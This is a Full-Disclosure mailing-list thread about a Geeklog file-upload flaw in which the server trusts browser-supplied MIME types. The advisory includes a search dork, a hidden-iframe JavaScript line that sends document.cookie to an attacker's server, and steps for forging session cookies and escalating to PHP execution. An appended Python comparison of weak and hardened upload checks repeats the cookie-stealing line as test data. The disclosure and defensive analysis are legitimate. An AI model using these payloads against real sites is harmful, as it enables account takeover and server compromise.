Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
> > > Successful exploitation requires the ability to execute the uploaded JavaScript.
> > > The Geeklog Forum program can be used as an attack vector since it does not
> > > properly validate many $_GET / $_POST variables.
> >
> > Could you give us some more details about these XSS vulnerabilities ? :)
> > Cause all I see here is an RCE in the admin panel.
> > You confirm that there are XSS but we don't have any details about them...
>
> The easy one is when the forum allows anonymous posts and is configured for
> text posts. The anonymous user name is never filtered, so you can put
> anything there, including a reference to the javascript uploaded as the
> user profile image..

How about the php flaw?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
On 4 Oct 2009, at 08:47, Jaloh Smith wrote:

> The easy one is when the forum allows anonymous posts and is configured for
> text posts. The anonymous user name is never filtered, so you can put
> anything there, including a reference to the javascript uploaded as the
> user profile image..

That's actually a much worse exploit than the file upload. There's no reason the script you load has to be stored locally -- it works just as well if you pull it from another domain.
Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
> > > Successful exploitation requires the ability to execute the uploaded JavaScript.
> > > The Geeklog Forum program can be used as an attack vector since it does not
> > > properly validate many $_GET / $_POST variables.
> >
> > Could you give us some more details about these XSS vulnerabilities ? :)
> > Cause all I see here is an RCE in the admin panel.
> > You confirm that there are XSS but we don't have any details about them...

The easy one is when the forum allows anonymous posts and is configured for text posts. The anonymous user name is never filtered, so you can put anything there, including a reference to the javascript uploaded as the user profile image..
Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
> Files with .jpg extensions can be uploaded, but these files can contain
> anything, like javascript or PHP code. Using FireFox you can upload any
> jpg extension and it will be accepted since FireFox sets the mime type
> based on file extension.
>
> Uploading usually requires that you first create a user account. Once an
> account is created, you can upload a user photo, which could take advantage
> of this vulnerability.

Ok so this is not a remote file upload issue if you can only upload allowed files (not files with bad exts), this is just a feature that doesn't validate the mime type. This can help for another exploitation but you can't execute code directly at this point.

> Potential Abuse
> ===
> Executable javascript can easily be uploaded. There are several XSS holes in
> many of the Geeklog plugins which could run the uploaded javascript. If a simple
> cookie stealing javascript were uploaded, it could be used to expose the Geeklog
> uid and password hash which is as good as having the actual password.

So you just upload a JS file in order to help you with the XSS ?

> If you expose an administrative account, you have full access to the admin panel
> where you can set the staticpages.PHP permission to true, then create a
> static page that will run any PHP script you desire, potentially exposing
> the entire server.

Ok so here you have a remote code execution in the admin panel.

> Successful exploitation requires the ability to execute the uploaded JavaScript.
> The Geeklog Forum program can be used as an attack vector since it does not
> properly validate many $_GET / $_POST variables.

Could you give us some more details about these XSS vulnerabilities ? :)
Cause all I see here is an RCE in the admin panel.
You confirm that there are XSS but we don't have any details about them...
[Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
==
Geeklog <= v1.6.0sr2 - Remote File Upload
Discovered: JaL0h
Software Site: http://www.geeklog.net
Dork: "By Geeklog" "Created this page in" +seconds +powered
==

Remote File Upload
==
Geeklog has several options to upload images. The image upload process does not validate the mime type of the upload. Geeklog trusts the mime type specified by the browser and also checks the file extension, both of which are very easy to spoof.

Files with .jpg extensions can be uploaded, but these files can contain anything, like javascript or PHP code. Using FireFox you can upload any jpg extension and it will be accepted since FireFox sets the mime type based on file extension.

Uploading usually requires that you first create a user account. Once an account is created, you can upload a user photo, which could take advantage of this vulnerability.

Potential Abuse
===
Executable javascript can easily be uploaded. There are several XSS holes in many of the Geeklog plugins which could run the uploaded javascript. If a simple cookie stealing javascript were uploaded, it could be used to expose the Geeklog uid and password hash which is as good as having the actual password.

Sample JavaScript
(writes a zero-size hidden iframe whose URL carries document.cookie to the attacker's server)

  document.write('<iframe src="http://my.cookiestealingsite.com/cs.php?ck=' + document.cookie + '" id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="0" scrolling="no" height="0" style="visibility:hidden;">');

Once the uid and password hash is known, you can set a cookie in your browser:

  geeklog=[uid]; password=[md5 hash];

which gives you instant access to everything the user has access to. If you expose an administrative account, you have full access to the admin panel where you can set the staticpages.PHP permission to true, then create a static page that will run any PHP script you desire, potentially exposing the entire server.

The cookie exploit was originally documented by Nine:Situations:Group::bookoo http://www.milw0rm.com/exploits/8376 and remains unfixed.

Successful exploitation requires the ability to execute the uploaded JavaScript. The Geeklog Forum program can be used as an attack vector since it does not properly validate many $_GET / $_POST variables.
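Added example, not code from the advisory or from Geeklog itself: the kind of check the advisory describes (extension allow-list plus the MIME type the browser declares) side by side with a content-based check that decides from the file's leading bytes and refuses PHP or script tags hidden inside an otherwise valid image. The allow-list, the sample uploads, the attacker.invalid host name and all function names are constructed for illustration; Geeklog's real upload code is not on this page.

```python
import re

# Extension -> (canonical MIME type, accepted magic-byte prefixes).
# Constructed allow-list for the example; Geeklog's real table is not on the page.
ALLOWED = {
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}

# PHP open tags and script tags have no business inside an image body.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script\b", re.IGNORECASE)


def ext_of(filename):
    """Lower-cased extension, or '' when there is none."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def vulnerable_accept(filename, declared_mime):
    """The check the advisory describes: extension allow-list plus the MIME
    type the browser declares. Both values are chosen by the uploader, and
    Firefox derives the declared type from the extension alone, so renaming
    payload.js to payload.jpg passes."""
    ext = ext_of(filename)
    return ext in ALLOWED and declared_mime == ALLOWED[ext][0]


def hardened_accept(filename, declared_mime, data):
    """Decide from the bytes; the declared type is recorded but never trusted.
    Returns (accepted, reason)."""
    ext = ext_of(filename)
    if ext not in ALLOWED:
        return False, "extension not allowed"
    expected_mime, magics = ALLOWED[ext]
    if not any(data.startswith(m) for m in magics):
        return False, "content is not %s" % expected_mime
    if SCRIPT_MARKERS.search(data):
        # Polyglot: genuine image header followed by PHP or HTML. Reject, and
        # in production also re-encode the image and serve uploads from a
        # host or directory where the web server never executes PHP.
        return False, "script markers inside image"
    note = "ok" if declared_mime == expected_mime else "ok (declared %s)" % declared_mime
    return True, note


# Constructed sample uploads (not real captures).
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00H\x00H\x00\x00" + b"\x00" * 32
FAKE_JPG_JS = (b"document.write('<iframe src=\"http://attacker.invalid/cs.php?ck='"
               b" + document.cookie + '\" style=\"visibility:hidden;\">');")
FAKE_JPG_PHP = b"<?php echo 'injected'; ?>"
POLYGLOT = REAL_JPEG + b"<?php echo 'injected'; ?>"


def run_demo():
    """Run every sample through both checks; returns {name: (old, content_based)}."""
    cases = {
        "photo.jpg":   REAL_JPEG,
        "payload.jpg": FAKE_JPG_JS,
        "shell.jpg":   FAKE_JPG_PHP,
        "poly.jpg":    POLYGLOT,
        "shell.php":   FAKE_JPG_PHP,
    }
    results = {}
    for name, data in cases.items():
        # Firefox-style declared type: derived from the extension alone.
        declared = "image/jpeg" if name.endswith(".jpg") else "application/octet-stream"
        results[name] = (vulnerable_accept(name, declared),
                         hardened_accept(name, declared, data)[0])
    return results


if __name__ == "__main__":
    for name, (old, new) in run_demo().items():
        print("%-12s old check: %-5s content check: %s" % (name, old, new))
```

Every renamed payload sails through the old check and is stopped by the magic-byte test; the polyglot case is the one the magic-byte test alone misses, which is why the marker scan (and, in a real deployment, re-encoding plus a no-PHP upload directory) is there.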